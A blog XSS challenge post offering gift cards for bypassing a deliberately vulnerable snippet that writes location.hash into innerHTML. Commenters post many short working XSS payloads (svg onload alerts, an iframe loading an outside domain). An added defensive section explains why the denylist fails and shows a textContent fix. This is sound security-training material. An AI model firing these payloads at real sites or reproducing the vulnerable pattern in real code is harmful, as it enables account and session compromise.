I’m a big fan of XSS and to make my new website more visible to the infosec guys I’m offering two Amazon gift cards.
The first correct solution will receive a $50 Amazon gift card. The second one will receive a $25 Amazon gift card.
The rules are simple (like the challenge). Show an alert box in the following vulnerable code with a message containing the word xss.
[code lang="html"]
<script>
function go()
{
    var w = location.hash;
    w = w.replace(/['", ]+/g, "");
    document.getElementById("say").innerHTML = w.substring(0,26);
}
</script>
<div id="say"></div>
<a onclick="go()">Say it</a>
[/code]
Rules:
- You can’t use some of the chars represented in the w.replace line of code
- You can only use Chrome, Firefox, Opera, Internet Explorer or Safari latest versions
- XSS vector must be less than or equal to 26 chars long
- When commenting your entry use the [ code]code[ /code] to write your code (without the leading space)
The challenge will end on 19 August at midnight. All the solutions must be added in this post's comments.
All the comments will be inactive until the challenge finishes.
UPDATE: I’ll give a bonus to the user who replies with the most creative XSS.
Good luck! Happy hunting 🙂
Double post, probably chars were stripped from blog comments code. You should decode it before trying, anyway [code]#<svg/onload=alert(`xss`)>[/code] tested on firefox 😀
[code]#<svg/onload=alert(/xss/)>[/code]
[code]#<svg/onload=alert`xss`>[/code] (Works on MS Edge, Win10)
Oh, also works on FF34+ (incl. latest). Not sure if Edge is allowed ^^
[code]#<p/onclick=alert(/xss/)>a[/code]
We could use the following payload to execute an alert with the word XSS, simple but effective ^^
[code]<svg/onload=alert(/XSS/)>[/code]
Tested on Firefox 40.0
Have fun 🙂
This works (if you click on the big “a”):
[code]<h1/onclick=alert(1)>a[/code]
[code]")}alert(/XSS/);{//[/code]
http://jsfiddle.net/Lk41g897/1/
[code]function go()
{
var w = location.hash;
w = w.replace(/['", ]+/g, "");
document.getElementById("" onclick=alert(1)//*/alert(1)//").innerHTML = w.substring(0,26);
}
<div id=""; onclick=alert(1)//*/alert(1)// ">;
<a>" onclick=alert(1)//*/alert(1)// ‘ </a>[/code]
[code]<svg/onload=alert(`xss`)>[/code]
[code]<svg/onload=alert(/xss/)>[/code]
Works on latest Firefox.
[code]<svg/onload=alert`xss`>[/code]
Tested on latest ff
[code]<iframe/src=//14.rs>[/code]
Tested ff
[code]#<svg/onload=alert(/xss/)>[/code]
[code]<svg><script>/<@/>alert(1)</script>[/code]
Browser: Firefox
Os: Windows
[code]<1/<svg/onload=alert`1`;>[/code]
works on Microsoft Edge
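For defenders, an added example (not the challenge author's code) showing why the denylist in `go()` fails against entries already posted above, next to a hardened variant that assigns the fragment as text. `opensTag`, `escapeHtml`, `goSafe` and `audit` are hypothetical names, and the filter's character class is assumed to be `['", ]`.

```javascript
// Added example (not the challenge author's code). Runs in Node or a browser console.

// The filter from go() on this page, assuming the character class is ['", ].
function challengeFilter(hash) {
  return hash.replace(/['", ]+/g, "").substring(0, 26);
}

// True when a string can still start an element, comment or bogus comment
// once it is handed to innerHTML ("<" followed by a letter, "/", "!" or "?").
function opensTag(s) {
  return /<[a-z\/!?]/i.test(s);
}

// Hypothetical helper: encode the characters that are significant in HTML.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Hardened go(): the fragment is assigned as text, so it is never parsed as markup.
// `doc` is passed in so the function can be exercised without a browser.
function goSafe(doc, hash) {
  doc.getElementById("say").textContent = hash.replace(/^#/, "").substring(0, 26);
}

// Entries copied from the comments on this page.
const ENTRIES = [
  "#<svg/onload=alert(/xss/)>",
  "#<svg/onload=alert`xss`>",
  "#<p/onclick=alert(/xss/)>a",
];

// For each entry: does the denylist leave live markup, and does encoding neutralise it?
function audit(entries) {
  return entries.map((entry) => {
    const filtered = challengeFilter(entry);
    return {
      entry,
      unchangedByFilter: filtered === entry,
      markupAfterFilter: opensTag(filtered),
      markupAfterEscape: opensTag(escapeHtml(filtered)),
    };
  });
}

console.table(audit(ENTRIES));
```

Every entry passes through the denylist unchanged because none of them needs a quote, comma or space; the fix is to stop parsing the fragment as HTML (`textContent`) or to encode it before it reaches `innerHTML`.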